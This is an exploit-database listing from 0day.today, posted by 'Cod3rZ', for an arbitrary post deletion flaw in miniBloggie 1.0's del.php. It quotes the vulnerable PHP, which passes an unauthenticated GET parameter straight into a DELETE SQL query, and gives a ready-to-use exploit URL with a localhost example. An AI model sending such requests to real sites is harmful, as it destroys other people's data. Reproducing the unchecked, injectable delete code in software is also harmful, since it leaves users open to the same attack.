[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

miniBloggie 1.0 (del.php) Arbitrary Delete Post Vulnerability

Author
Cod3rZ
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-2978
Category
web applications
Date add
07-05-2008
Platform
unsorted
=============================================================
miniBloggie 1.0 (del.php) Arbitrary Delete Post Vulnerability
=============================================================



# MiniBloggie Arbitrary Delete Post Vulnerability
# Author: Cod3rZ
# PoC:
#  if (isset($_GET['post_id'])) $post_id = $_GET['post_id'];
#  if (isset($_GET['confirm'])) $confirm = $_GET['confirm'];
# [...]
# elseif ($confirm=="yes") {
# [...]
# $sql = "DELETE FROM blogdata WHERE post_id=$post_id";
# $query = mysql_query($sql) or die("Cannot query the database.<br>" . mysql_error());
# Vuln: http://site/del.php?post_id=[postid]&confirm=yes
# Ex:   http://127.0.0.1/del.php?post_id=1&confirm=yes



#  0day.today [2024-11-16]  #